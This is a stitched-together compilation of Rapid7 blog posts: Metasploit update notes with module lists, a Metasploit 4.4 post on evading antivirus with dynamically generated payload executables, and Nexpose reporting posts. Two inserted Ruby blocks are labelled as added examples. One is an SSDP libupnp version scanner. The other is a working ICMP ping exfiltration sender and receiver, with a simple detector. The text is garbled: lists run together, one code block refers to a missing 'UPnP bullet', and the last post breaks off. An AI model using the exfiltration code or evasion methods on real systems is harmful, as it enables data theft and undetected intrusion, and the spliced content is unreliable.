- Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow by juan vazquez, Dmitriy Pletnev, and Dr_IDE exploits CVE-2010-2590
- Foxit Reader Plugin URL Processing Buffer Overflow by juan vazquez, Sven Krewitt, and rgod exploits OSVDB-89030
- Honeywell HSC Remote Deployer ActiveX Remote Code Execution by juan vazquez exploits CVE-2013-0108
- Honeywell Tema Remote Installer ActiveX Remote Code Execution by juan vazquez, Billy Rios, and Terry McCorkle exploits OSVDB-76681
- Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability by sinn3r, juan vazquez, Peter Vreugdenhil, eromang, and mahmud ab rahman exploits
MS13-008InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow by juan vazquez, Alexander Gavrun, Dmitriy Pletnev, and James Fitts exploits ZDI-12-168IBM Lotus iNotes dwa85W ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-132Java CMM Remote Code Execution by juan vazquez and Unknown exploits CVE-2013-1493Maxthon3 about:history XCS Trusted Zone Code Execution by sinn3r, juan vazquez, and Roberto Suggi LiveraniMicrosoft Internet Explorer Option Element Use-After-Free by sinn3r, juan vazquez, and Ivan Fratric exploits MS11-081MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free by Scott Bell exploits MS13-009IBM Lotus Notes Client URL Handler Command Injection by juan vazquez, Moritz Jodeit, and Sean de Regge exploits ZDI-12-154Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-008VMWare OVF Tools Format String Vulnerability by juan vazquez and Jeremy Brown exploits CVE-2012-3569IBM Lotus QuickR qp2 ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-134Cool PDF Image Stream Buffer Overflow by juan vazquez, Chris Gabriel, and Francis Provencher exploits CVE-2012-4914KingView Log File Parsing Buffer Overflow by juan vazquez, Carlos Mario Penagos Hollman, and Lucas Apa exploits CVE-2012-4711VMWare OVF Tools Format String Vulnerability by juan vazquez and Jeremy Brown exploits CVE-2012-3569RealPlayer RealMedia File Handling Buffer Overflow by suto exploits CVE-2012-5691FreeFloat FTP Server Arbitrary File Upload by sinn3r and juan vazquez exploits OSVDB-88303Sami FTP Server LIST Command Buffer Overflow by Doug Prostko and superkojiman exploits OSVDB-90815HP Intelligent Management Center Arbitrary File Upload by juan vazquez and rgod exploits ZDI-13-050Windows Manage Memory Payload Injection by sinn3r and Carlos PerezWindows Manage Persistent Payload Installer by Carlos PerezWindows Manage User Level Persistent Payload Installer by Brandon 
McCann "zeknox" and Thomas McCarthy "smilingraccoon"ActFax 5.01 RAW Server Buffer Overflow by juan vazquez, Craig Freyman, and corelanc0d3r exploits OSVDB-89944BigAnt Server DUPF Command Arbitrary File Upload by juan vazquez and Hamburgers Maccoy exploits CVE-2012-6274BigAnt Server 2 SCH And DUPF Buffer Overflow by juan vazquez and Hamburgers Maccoy exploits CVE-2012-6275Enterasys NetSight nssyslogd.exe Buffer Overflow by juan vazquez, Jeremy Brown, and rgod exploits ZDI-11-350Firebird Relational Database CNCT Group Number Buffer Overflow by Spencer McIntyre exploits CVE-2013-2492HP Data Protector DtbClsLogin Buffer Overflow by juan vazquez and AbdulAziz Hariri exploits ZDI-10-174IBM Cognos tm1admsd.exe Overflow by juan vazquez and Unknown exploits ZDI-12-101IBM System Director Agent DLL Injection by juan vazquez, Bernhard Mueller, and kingcope exploits CVE-2009-0880Microsoft SQL Server Database Link Crawling Command Execution by Antti Rantasaari and Scott Sutherland "nullbind"SCADA 3S CoDeSys Gateway Server Directory Traversal by Enrique Sanchez exploits CVE-2012-4705Freesshd Authentication Bypass by Aris, Daniele Martini, and kcope exploits CVE-2012-6066Linux Gather PPTP VPN chap-secrets Credentials by sinn3rLinux Manage Download and Exececute by Joshua D. AbrahamMulti Manage Record Microphone by sinn3rWindows Gather BulletProof FTP Client Saved Password Extraction by juan vazquezRazer Synapse Password Extraction by Brandon McCann "zeknox", Matt Howard "pasv", and Thomas McCarthy "smilingraccoon"Windows Gather Spark IM Password Extraction by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"Steam client session Collector. 
by Nikolai RusakovWindows Gather AD Enumerate Computers by Ben CampbellWindows Gather Local Admin Search by Brandon McCann "zeknox", Royce Davis "r3dy", and Thomas McCarthy "smilingraccoon"Windows NetLM Downgrade Attack by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"Microsoft Word UNC Path Injector by SphaZWindows Manage Reflective DLL Injection Module by Ben CampbellWindows Manage Webcam by sinn3rAxigen Arbitrary File Read and Delete by juan vazquez and Zhao Liang exploits CVE-2012-4940D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution by Michael Messner exploits OSVDB-89861DLink DIR 645 Password Extractor by Michael Messner and Roberto Paleari exploits OSVDB-90733Linksys E1500/E2500 Remote Command Execution by Michael Messner exploits OSVDB-89912Linksys WRT54GL Remote Command Execution by Michael Messner exploits OSVDB-89421Ruby on Rails Devise Authentication Password Reset by jjarmoc and joernchen exploits CVE-2013-0233PsExec NTDS.dit And SYSTEM Hive Download Utility by Royce DavisMicrosoft Word UNC Path Injector by SphaZDopewars Denial of Service by Doug Prostko exploits CVE-2009-3591OpenSSL TLS 1.1 and 1.2 AES-NI DoS by Wolfgang Ettlinger exploits CVE-2012-2686DNS Brutefoce Enumeration by Carlos PerezDNS Basic Information Enumeration by Carlos PerezDNS Reverse Lookup Enumeration by Carlos PerezDNS Common Service Record Enumeration by Carlos PerezDiscover External IP via Ifconfig.me by RageLtManHTTP SSL Certificate Impersonation by Chris John RileyW3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract by Christian Mehlmauer and Jason A. 
Donenfeld exploits OSVDB-88744XBMC Web Server Directory Traversal by sinn3r, Lucas "acidgen" Lundgren IOActive, and Matt "hostess" AndrekoTitan FTP XCRC Directory Traversal Information Disclosure by Brandon McCann @zeknox and jduck exploits OSVDB-65533DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502DLink DIR-615H HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility by hdm and Michael Messner exploits CVE-1999-0502Novell Groupwise Agents HTTP Directory Traversal by juan vazquez and r () b13$ exploits CVE-2012-0419Joomla Page Scanner by newpid0Joomla Plugins Scanner by newpid0Joomla Version Scanner by newpid0Linksys E1500 Directory Traversal Vulnerability by Michael Messner exploits OSVDB-89911Netgear SPH200D Directory Traversal Vulnerability by Michael Messner exploits BID-57660Ruby on Rails JSON Processor YAML Deserialization Scanner by hdm and jjarmoc exploits CVE-2013-0333Ruby on Rails XML Processor YAML Deserialization Scanner by hdm and jjarmoc exploits CVE-2013-0156Simple Web Server 2.3-RC1 Directory Traversal by sinn3r and CwG GeNiuS exploits OSVDB-88877SVN wc.db Scanner by Stephen HaywoodSymantec Messaging Gateway 9.5 Log File Download Vulnerability by sinn3r and Ben Williams exploits CVE-2012-4347Titan FTP Administrative Password Disclosure by Spencer McIntyre exploits CVE-2013-1625TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability by Michael Messner exploits CVE-2012-5687Wordpress Pingback Locator by Brandon McCann "zeknox", Christian Mehlmauer "FireFart", and Thomas McCarthy "smilingraccoon"Multiple DVR Manufacturers Configuration Disclosure by juan vazquez and Alejandro Ramos exploits CVE-2013-1391Ray Sharp DVR Password Retriever by hdm and someluserMYSQL File/Directory Enumerator by Robin WoodPostgreSQL Database Name Command Line Flag Injection by hdm exploits CVE-2013-1899MS12-020 Microsoft Remote 
Desktop Checker by Brandon McCann @zeknox and Royce Davis @R3dy_ exploits MS12-020SAP ICF /sap/public/info Service Sensitive Information Gathering by Agnivesh Sathasivam, ChrisJohnRiley, and nmonkeeSAPRouter Admin Request by Chris John Riley, Ian de Villiers, Joris van de Vis, Mariano Nunez, and nomnkeeICMP Exfiltration Service by Chris John RileyAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
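The UDP/1900 scan that the UPnP bullet above alludes to, as an added example that is not part of the original post and not one of the Metasploit UPnP modules: it builds an SSDP M-SEARCH, parses the unicast replies, and flags SERVER headers that advertise a libupnp ("Portable SDK for UPnP devices") build older than 1.6.18, the release that fixed the unique_service_name() bug the roundup lists as CVE-2012-5958. The 1.6.18 threshold, the sample replies and the 192.0.2.x addresses are this example's own assumptions, not the module's; the live probe has to run from a host on the same broadcast domain as the devices.

```ruby
require "socket"

# Added example: SSDP discovery plus a libupnp version check, written for this
# page. It is not one of the Metasploit UPnP modules. Parsing and triage run
# offline on constructed replies; ssdp_discover is the live probe.

SSDP_ADDR = "239.255.255.250"
SSDP_PORT = 1900

# Assumption: libupnp 1.6.18 is the first release fixing CVE-2012-5958
# (unique_service_name() overflow). Verify against the vendor advisory before
# relying on it in a report.
FIXED_LIBUPNP = [1, 6, 18].freeze

# The M-SEARCH a discovery client multicasts; MX is the maximum random delay
# (seconds) devices are asked to wait before replying.
def msearch_request(st: "ssdp:all", mx: 2)
  [
    "M-SEARCH * HTTP/1.1",
    "HOST: #{SSDP_ADDR}:#{SSDP_PORT}",
    "MAN: \"ssdp:discover\"",
    "MX: #{mx}",
    "ST: #{st}",
    "",
    ""
  ].join("\r\n")
end

# Parse one unicast reply (an HTTP/1.1 200 OK status line plus headers) into a
# hash keyed by lower-cased header name. Returns nil for anything that is not SSDP.
def parse_ssdp_response(data)
  lines = data.to_s.split(/\r?\n/)
  return nil unless lines.first.to_s =~ %r{\AHTTP/1\.[01] 200}
  headers = {}
  lines.drop(1).each do |line|
    name, value = line.split(":", 2)
    next if value.nil?
    headers[name.strip.downcase] = value.strip
  end
  headers
end

# Pull the libupnp version out of a SERVER header such as
# "Linux/2.6.x, UPnP/1.0, Portable SDK for UPnP devices/1.6.6".
def libupnp_version(server_header)
  m = server_header.to_s.match(%r{Portable SDK for UPnP devices/(\d+)\.(\d+)\.(\d+)}i)
  m && m.captures.map(&:to_i)
end

def vulnerable_libupnp?(server_header)
  version = libupnp_version(server_header)
  !version.nil? && (version <=> FIXED_LIBUPNP) < 0
end

# Turn [ip, raw_reply] pairs into one triage record per well-formed reply.
def triage(replies)
  replies.map do |ip, data|
    headers = parse_ssdp_response(data)
    next if headers.nil?
    {
      ip: ip,
      location: headers["location"],
      server: headers["server"],
      usn: headers["usn"],
      vulnerable_libupnp: vulnerable_libupnp?(headers["server"])
    }
  end.compact
end

# Live probe: multicast one M-SEARCH and collect replies for `timeout` seconds.
# Nothing in this file calls it; run it yourself from a host on the LAN.
def ssdp_discover(timeout: 3, st: "ssdp:all")
  sock = UDPSocket.new
  sock.send(msearch_request(st: st, mx: timeout), 0, SSDP_ADDR, SSDP_PORT)
  replies = []
  deadline = Time.now + timeout
  while (remaining = deadline - Time.now) > 0
    break unless IO.select([sock], nil, nil, remaining)
    data, addr = sock.recvfrom(65_535)
    replies << [addr[3], data]
  end
  replies
ensure
  sock&.close
end

# Constructed sample replies (not captured from real devices) so triage can be
# exercised offline: an embedded device on an old libupnp, a Windows media
# server, and a stray non-SSDP datagram.
SAMPLE_REPLIES = [
  ["192.0.2.10",
   "HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n" \
   "LOCATION: http://192.0.2.10:49152/description.xml\r\n" \
   "SERVER: Linux/2.6.x, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n" \
   "ST: upnp:rootdevice\r\nUSN: uuid:00000000-0000-0000-0000-000000000001::upnp:rootdevice\r\n\r\n"],
  ["192.0.2.20",
   "HTTP/1.1 200 OK\r\nLOCATION: http://192.0.2.20:2869/upnphost/udhisapi.dll?content=uuid:2\r\n" \
   "SERVER: Microsoft-Windows-NT/5.1 UPnP/1.0 UPnP-Device-Host/1.0\r\n" \
   "ST: upnp:rootdevice\r\nUSN: uuid:2::upnp:rootdevice\r\n\r\n"],
  ["192.0.2.30", "not an ssdp reply at all"]
].freeze
```

`triage(ssdp_discover)` is the whole workflow on a live network; `triage(SAMPLE_REPLIES)` exercises the same parsing offline. A device that answers M-SEARCH from across a routed boundary, or from the Internet, is the finding that matters regardless of its SERVER string, because it means the port 1900 filtering the bullet asks about is not in place.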

Weekly Metasploit Update: Browser Autopwn 0-day, ICMP Exfiltration, LM Downgrading, and Reporting Speedups

Today marks the first Metasploit update of the new year, and it's been a little while since the last, so there's a bumper crop of new modules; eighteen, to be precise.

Internet Explorer 0-day and Browser Autopwn

While we didn't ship an update over the holidays, that didn't stop @_sinn3r, @_juan_vazquez_, @eromang, @yomuds, and @binjo from tearing into the latest public 0-day for Microsoft Internet Explorer 8. For the details on exploit development, take a look at sinn3r's fantastico write-up. As with all complex and interesting exploits, there's always some touch-up after the initial release, and ie_cbutton_uaf is no exception. It's now a component of Metasploit's Browser Autopwn meta-module.

If you aren't familiar, Browser Autopwn is a throw-everything-at-it approach to client exploitation, and it's been a part of Metasploit for several years now. Here's a video of one of the earlier incarnations by the guys over at pauldotcom, and the usual use hasn't changed a whole lot since then (however, many more exploits are now included). As you can see, all you need to do is fire it up, let all the exploits set themselves up, then await your target. If he's running an unpatched IE8, ie_cbutton_uaf should pop a shell for you, since as of this writing there's still no hotfix available.

ICMP Exfiltration

Every once in a while, you might find yourself in an argument with a network engineer about the security implications of ping. Yes, good old, reliable, required-by-RFC 792 ICMP Type 8 ping. What harm could there be in allowing computers to ping arbitrary hosts on the Internet?

Well, this update includes community contributor @ChrisJohnRiley's delightful ICMP Exfiltration Service module. What this does is set up a listener to catch data tunneled out of a target site over good old, reliable, required-by-RFC 792 ICMP Type 8 ping. The data being exfiltrated is then saved off as loot, for use in your report demonstrating the security implications of allowing ping from the desktop.

If you're dealing with a client that doesn't care about exfiltration, then first, you should get them to read Iftach Ian Amit's paper from January of 2012, and then remind them that if they spent any time at all on splitting their DNS infrastructure, implementing egress firewall rules, or implementing a BYOD policy, then they are implicitly buying into exfiltration awareness anyway.

Windows Post Modules

Also this week, we see three new post modules from community contributor @zeknox. I'm a fan of post modules; they're usually pretty easy to write and test, and often end up automating away an otherwise troublesome pen-testing chore. Of the bunch, my favorite is the Windows NetLM Downgrade Attack; this is a sneaky way to recover a user's cleartext password by forcing a machine to fall back to the weak LM hashing algorithm when authenticating to SMB servers, then cracking the captured LM response. This comes in handy, of course, when you control the SMB server in question. For more on this technique, see Brandon's write-up over on Pentestgeek.com, or the original scenario described by Dave Howard.

Report Speedups

For those of you on Metasploit Pro and Express, you should also see significant improvements in your report generation. All Standard Reports there have been updated to use disk virtualization: instead of holding the report generation objects in memory, they are now written to disk as needed. The main goal of this change was to allow the generation of reports against datasets of arbitrary size. Very large numbers of hosts or other objects that previously caused report generation to crash are now handled with the greatest of ease. Additional gravy: report generation now uses about 25% less memory and takes 13% less time on average!

New Modules

Last update had just the one new module. We make up for that this week, with eighteen. Here they are.

Exploit modules

- Netwin SurgeFTP Remote Command Execution by sinn3r and Spencer McIntyre
- Foswiki MAKETEXT Remote Command Execution by juan vazquez and Brian Carlson exploits CVE-2012-6329
- TWiki MAKETEXT Remote Command Execution by juan vazquez and George Clark exploits CVE-2012-6329
- WordPress Asset-Manager PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82653
- WordPress WP-Property PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82656
- Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability by sinn3r, juan vazquez, eromang, and mahmud ab rahman exploits CVE-2012-4792
- InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow by juan vazquez, Alexander Gavrun, Dmitriy Pletnev, and James Fitts exploits ZDI-12-168
- IBM Lotus iNotes dwa85W ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-132
- IBM Lotus Notes Client URL Handler Command Injection by juan vazquez, Moritz Jodeit, and Sean de Regge exploits ZDI-12-154
- IBM Lotus QuickR qp2 ActiveX Buffer Overflow by juan vazquez and Gaurav Baruah exploits ZDI-12-134
- RealPlayer RealMedia File Handling Buffer Overflow by suto exploits CVE-2012-5691
- Microsoft SQL Server Database Link Crawling Command Execution by Antti Rantasaari and Scott Sutherland "nullbind"

Auxiliary and Post modules

- SVN wc.db Scanner by Stephen Haywood
- SAPRouter Admin Request by Chris John Riley, Ian de Villiers, Joris van de Vis, Mariano Nunez, and nmonkee
- ICMP Exfiltration Service by Chris John Riley
- Windows Gather Spark IM Password Extraction by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"
- Windows Gather Local Admin Search by Brandon McCann "zeknox", Royce Davis "r3dy", and Thomas McCarthy "smilingraccoon"
- Windows NetLM Downgrade Attack by Brandon McCann "zeknox" and Thomas McCarthy "smilingraccoon"

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandon Turner's most excellent release notes.
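The tunnel that the ICMP Exfiltration Service catches, as an added example that is not part of the original post and not the module's own code: a sender that splits a secret across echo request payloads, a receiver that validates the ICMP checksum and reassembles the chunks by sequence number (tolerating reordering and refusing incomplete sessions), and, for the network engineer in that argument, a detector that flags echo requests whose payload is not what a stock ping client sends. The MAGIC marker, the chunk framing, the 32-byte chunk size and the two stock-payload patterns are this example's assumptions, not the module's protocol.

```ruby
# Added example: exfiltration over ICMP echo requests (RFC 792 type 8) and the
# matching receiver, written for this page. It is not Chris John Riley's module;
# the framing (MAGIC + chunk count + data) is this example's own design.
# Everything is built and parsed in memory, so it runs offline; putting the
# packets on the wire needs a raw socket and root.

ICMP_ECHO_REQUEST = 8
CHUNK_SIZE = 32              # data bytes per echo request (assumption)
MAGIC = "XFIL".b             # marker distinguishing our chunks from real pings

# RFC 1071 one's-complement checksum over an ICMP message.
def icmp_checksum(bytes)
  bytes = bytes.b
  bytes += "\x00".b if bytes.bytesize.odd?
  sum = bytes.unpack("n*").sum
  sum = (sum & 0xffff) + (sum >> 16) while sum > 0xffff
  (~sum) & 0xffff
end

# Echo request: type(1) code(1) checksum(2) identifier(2) sequence(2) payload.
def build_echo_request(ident, seq, payload)
  payload = payload.b
  header = [ICMP_ECHO_REQUEST, 0, 0, ident, seq].pack("CCnnn")
  csum = icmp_checksum(header + payload)
  [ICMP_ECHO_REQUEST, 0, csum, ident, seq].pack("CCnnn") + payload
end

# Sender side: split the secret into chunks and wrap each one as a ping.
# Payload layout: MAGIC, 16-bit total chunk count, then the chunk bytes.
def exfil_packets(secret, ident)
  chunks = secret.b.scan(/.{1,#{CHUNK_SIZE}}/m)
  chunks.each_with_index.map do |chunk, i|
    build_echo_request(ident, i, MAGIC + [chunks.size].pack("n") + chunk)
  end
end

# Parse a raw ICMP message. Returns nil unless it is an echo request with a
# valid checksum (a correct message checksums to zero with the field included).
def parse_echo_request(bytes)
  bytes = bytes.b
  return nil if bytes.bytesize < 8
  type, code, _csum, ident, seq = bytes.unpack("CCnnn")
  return nil unless type == ICMP_ECHO_REQUEST && code == 0
  return nil unless icmp_checksum(bytes) == 0
  { ident: ident, seq: seq, payload: bytes.byteslice(8, bytes.bytesize - 8) }
end

# Receiver side: group chunks by identifier and rebuild each secret once every
# sequence number in 0...total has arrived. Incomplete sessions are left out.
def reassemble(raw_packets)
  sessions = Hash.new { |h, k| h[k] = {} }
  raw_packets.each do |raw|
    pkt = parse_echo_request(raw)
    next unless pkt && pkt[:payload].start_with?(MAGIC)
    total = pkt[:payload].byteslice(MAGIC.bytesize, 2).unpack1("n")
    data = pkt[:payload].byteslice(MAGIC.bytesize + 2, pkt[:payload].bytesize)
    sessions[pkt[:ident]][pkt[:seq]] = [total, data]
  end
  sessions.each_with_object({}) do |(ident, chunks), out|
    total = chunks.values.first[0]
    next unless (0...total).all? { |i| chunks.key?(i) }
    out[ident] = (0...total).map { |i| chunks[i][1] }.join
  end
end

# Defensive side: a cheap detector. Stock ping clients send a fixed payload, so
# flag echo requests carrying anything else. The two patterns are assumptions
# about common clients (Linux iputils: 8-byte timestamp then bytes 0x10..0x3f;
# Windows: a 32-byte alphabet); tune them to the clients you actually run.
LINUX_PING_TAIL = (0x10..0x3f).to_a.pack("C*").freeze
WINDOWS_PING_PAYLOAD = (("a".."w").to_a + ("a".."i").to_a).join.b.freeze

def standard_ping_payload?(payload)
  (payload.bytesize == 56 && payload.byteslice(8, 48) == LINUX_PING_TAIL) ||
    payload == WINDOWS_PING_PAYLOAD
end

def suspicious_ping?(raw)
  pkt = parse_echo_request(raw)
  return false if pkt.nil?          # not an echo request; out of scope here
  !standard_ping_payload?(pkt[:payload])
end
```

On the sending side the output of `exfil_packets` goes into a `Socket.new(:INET, :RAW, Socket::IPPROTO_ICMP)`; the listener is `parse_echo_request` pointed at the same kind of socket (or at a pcap), feeding `reassemble`. The detector is deliberately crude: any `ping -s` with a non-default size will trip it, which is the right default for echo requests leaving the desktop network.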

Significantly Enhanced, yet Simplified Reporting

The new year is just around the corner and the Internet has been available to users for almost two decades now. We have had user experiences that have pushed the boundaries with software, touchscreen devices and mobile applications. We are now witnessing radical changes in user expectations. We at Rapid7 are constantly striving to understand these expectations and live up to them.

At Rapid7, our mission is to solve complex security challenges with simple, innovative solutions that offer speed with control. It goes without saying that we focus on a better user experience for our products, time and again, with every new release. The four vital elements of user experience are Value, Usability, Adoptability and Desirability (based on: www.uxmatters.com).

For our enterprise products like Nexpose and Metasploit, I see Value, Usability and Adoptability roll up into one element, and that is efficiency: how efficiently can a user get the job done? We started out by prioritizing the features, and since reporting is one of the most used features of Nexpose, we decided to start with improving the reporting experience for the Nexpose 5.5 release.

One place for all reporting needs

All reporting needs are rolled up into three user goals: create reports, view reports and manage report templates. With a streamlined interface, you can build and run reports, and create report templates, faster than ever before. The Reports configuration panel now features a clean layout and a three-tab navigation that simplifies all report-related tasks. The three tabs representing these three goals are designed to follow the concept of "Don't make me think": based on their goal, users can select the specific tab to directly access the desired tasks.

Simplified report creation workflow

The "Create New Report" UI is far more intuitive and efficient than before.

Flexibility and efficiency of use

Our research showed that most of our users use only some primary report creation settings. Only a few users occasionally need the flexibility to configure advanced settings. Based on that, we have hidden the advanced settings, making the UI simple and clutter-free. The system can now cater to both inexperienced and experienced users.

Recognition rather than recall

All canned report templates now come with a preview image that minimizes the user's memory load by making options visible. You no longer have to remember report names. Using the new carousel feature, you can scroll through template previews and enlarge views to see them in better detail.

Easy recovery from errors

We understand "To err is human". Inline error messages will help you quickly recognize and recover from any errors.

Cleaner, minimalist interface

The new minimalist table UI reduces clutter, and is designed for visual relief, without having to sacrifice any of the existing functionality. In the new design we have also ensured that the system status is visible and obvious.

Easy-to-use, powerful report template configuration features

It was never this easy to create and customize report templates. You can now choose from three different ways to create report templates:

- Report template type 1 - Document (PDF, HTML, RTF formats): simply drag and drop available report sections to create a customized report template.
- Report template type 2 - Export (CSV format): use this type when you would like to export specific data fields.
- Report template type 3 - Upload a template file (new): this is one of the most exciting and powerful features introduced in Nexpose. The new reporting engine allows you to upload additional report templates, which can be downloaded from the Rapid7 Community.

New report templates

Two new report templates isolate the assets that have a high number of threats, so that you can prioritize remediation tasks accordingly:

- Top 10 Assets by Vulnerabilities lists the 10 assets with the most vulnerabilities. It displays total vulnerabilities, and malware and exploit exposures for those vulnerabilities.
- Top 10 Assets by Vulnerability Risk lists the 10 assets with the highest risk scores. It displays risk scores, total vulnerabilities, and malware and exploit exposures for those assets.

At Rapid7 we are committed to improving the user experience for our customers. Feel free to leave me a message here or you can directly contact me at saurabh_dutta@rapid7.com

Security Configuration assessment capabilities that meet your needs with Nexpose 5.4

A great new feature has been added to our configuration assessment component in Nexpose 5.4: the ability to customize policies to meet your unique contextual needs, i.e. needs that are specific to your environment. You are now able to copy a built-in policy and edit its configuration, including the policy check values, to test your assets for compliance. This flexibility allows for custom, accurate and relevant configuration assessment.

Configuration assessment is important to assess the risk in deployments where heterogeneous configurations are present. It allows you to identify the assets that present a risk to a network by being misconfigured. Another advantage of configuration assessment is that it allows you to identify the most and least compliant rules for each policy. This means that you will be able to identify not only areas where you are doing well, but also potential areas where your policies may not make sense.

The goal, then, is to assess configuration compliance against policies that make sense for your particular needs. One good example of when this can come in handy: let's say your company policy for the account lockout threshold is more restrictive than the FDCC Windows policy's (less than or equal to five). Your company has decided that three failed attempts can occur before an account is locked out. You can now easily copy the FDCC policy, find the Account Lockout Threshold rule, and tweak it to check for three instead of five.

This is where the policy editor and the new features shipped with Nexpose 5.4 come into play. Several operations are enabled on built-in policies, and others can only be performed on copies of the built-in policies.

Operations on built-in policies include:

- Viewing the policy structure and check values with the policy viewer
- Copying the policy

Operations on copies (custom policies) include:

- Viewing the policy structure and check values with the policy viewer
- Copying the policy
- Editing the policy
- Deleting the policy

All these options are available on the Policies tab.

When you are in the policy viewer you can browse through the policy structure to find the groupings and rules that you are interested in, as well as use the "Find" mechanism to get to them. In viewer mode, you will only be able to see how a policy is configured. On the left-hand side you will see the policy structure in a tree format; on the right-hand side you will see the details for the node selected on the left.

When you are in the policy editor, you can not only browse through the policy structure, you can also modify the summary details for the policy (like its name and description), groups, rules and check values. Notice the "Save" and "Cancel" buttons available to save or cancel your modifications to the policy.

Once you have configured your policy to address your particular needs, you are ready to start checking for compliance on the policies that you care about.

Stay tuned, there's more coming.

New Metasploit 4.4: Risk Validation for Vulnerability Management with Nexpose, Improved AV Evasion, and Faster UI

Fresh out of the oven and in time for Black Hat Las Vegas, we present to you the new Metasploit 4.4 with these great new features:Focus Your Remediation Efforts: Metasploit Risk Validation for Nexpose Vulnerability ManagementYou may have been in this situation: your vulnerability scanning report is so long you don't know where to start. You don't have time to address all vulnerabilities, and you don't know which ones are important. If this sounds familiar, you may get very excited about Metasploit Pro's new and improved integration with Rapid7 Nexpose, which makes your problem go away.Why does this challenge exist in the first place? Vulnerability scanners can identify what software versions are installed and knows which software versions have potential vulnerabilities, but they can't detect whether a firewall, IDS, or other compensating controls affect the exploitability. Without being able to validate the risks, IT teams may be focusing on lower priority risks, rather than prioritizing vulnerabilities with known exploits and no compensating controls associated, which represent a very real threat to the organization.By integrating Metasploit Pro with Nexpose for risk validation, you can now prioritize the critical vulnerabilities that pose a real risk, fixing them before it's too late. 
Now you can focus your efforts on what matters.Specifically, Metasploit now tightly integrates with Nexpose by:Importing rich vulnerability data from Nexpose scans, sites, and XMLAutomatically validating the exploitability of many high-risk vulnerabilitiesProviding a simplified process to spot-check individual vulnerabilitiesPushing granular exploit results back to Nexpose via Vulnerability ExceptionsPushing device classifications back to Nexpose Asset Groups via Metasploit TagsEnhancing Metasploit reports with detailed Nexpose scan dataSecurity professionals benefit from the integration in the following ways:Quickly identify high-risk vulnerabilities not protected by compensating controlsMeasure the effectiveness of defensive solutions designed  to mitigate vulnerabilitiesIncrease credibility and reduce friction between IT operations and security teamsOn July 18 at 2pm EST, HD Moore will demonstrate the new functionality in the free webcast “Validate Risks in Your Security Assessment Program”. Register now - limited seats!Improved AV Evasion: "Now they will tremble again, at the sound of our silence" - The Hunt for Red OctoberSecurity is often an adversarial process. Metasploit is a part of the offensive side of that equation, constantly pushing the defenders to adjust and innovate. This involves a certain ammount of good-natured give-and-take between us here at Metasploit and the vendors who make defensive products like anti-virus solutions. The response to Metasploit from the AV world has been a mixed bag. Over the years our payloads have gotten higher and higher detection rates. This is especially true when an actual executable binary has to land on the target system, such as in the case of the psexec module. We have recently set out to respond back to the AV vendors to once again challenge them to step up their game while we enable our team to slip past their defenses yet again.The problem is essentially two-fold, as it always is with AV. 
There are the signature detections. These, by and large, appear to be cases where the AV vendors literally copied our template files that the payloads get inserted into, and wrote signatures for them. That way they would pick us up no matter what payload was used, because the template itself would be flagged. This is an extremely lazy approach but has the virtue of being effective if we don't do anything about it. So the first step was to address the issue of these templates. We could generate new templates for our Metasploit Pro users, but we had done that once before and it only bought us a temporary reprieve. To create a more long-term solution we developed a method that generates a totally unique executable every time it's run, making it much more difficult for AV vendors to simply grab the template and write a signature.The second problem is heuristics. This is where the AV vendor actually watches the behavior of the code and tries to analyze it appropriately. This is a far more effective but much more tricky and complicated way of detecting malicious code. Some of the key factors for avoiding this involve hiding obviously suspicious behavior and making it look as normal and innocent as possible. So as we generate our executables each time we pay special care to avoid any obviously malicious activity, and look like a normal legitimate program.The current iteration of this technique is now available for users of the Metasploit Pro product when using the psexec exploit. When selecting the psexec module from the module runner, they can select the DynamicExe option from under Advanced Options. Also, when running a Metasploit Pro Bruteforce they can select 'Dynamically generate payload EXE for SMB' under the payload settings. These generated payloads will in many cases do a better job at evading anti-virus solutions than our old templates. However, they do not have the virtue of being signed. 
We will continue to improve this feature over the coming weeks, and hopefully continue to improve our ability to evade detection.

Speedy UI, Even Under Heavy Load

We've taken Metasploit into the wind tunnel and made it a lot more aerodynamic for users who are handling tens of thousands of hosts. The user interface now responds much faster, so you'll have to find a better excuse for your coffee break.

Shiny New Auxiliary and Exploit Modules

As usual, the big point releases cater more to the commercial Metasploit users, while our regular weekly updates provide value to our open source community. Since we released Metasploit 4.3 on April 24, we have added 101 new modules to Metasploit: 68 exploits, 22 auxiliary modules, 9 post modules, 1 payload, and 1 encoder. All of these are also available in the free Metasploit Community Edition and in the open source Metasploit Framework, both of which were updated with this release.

Since our last weekly update, we've added these new modules to our exploit database:
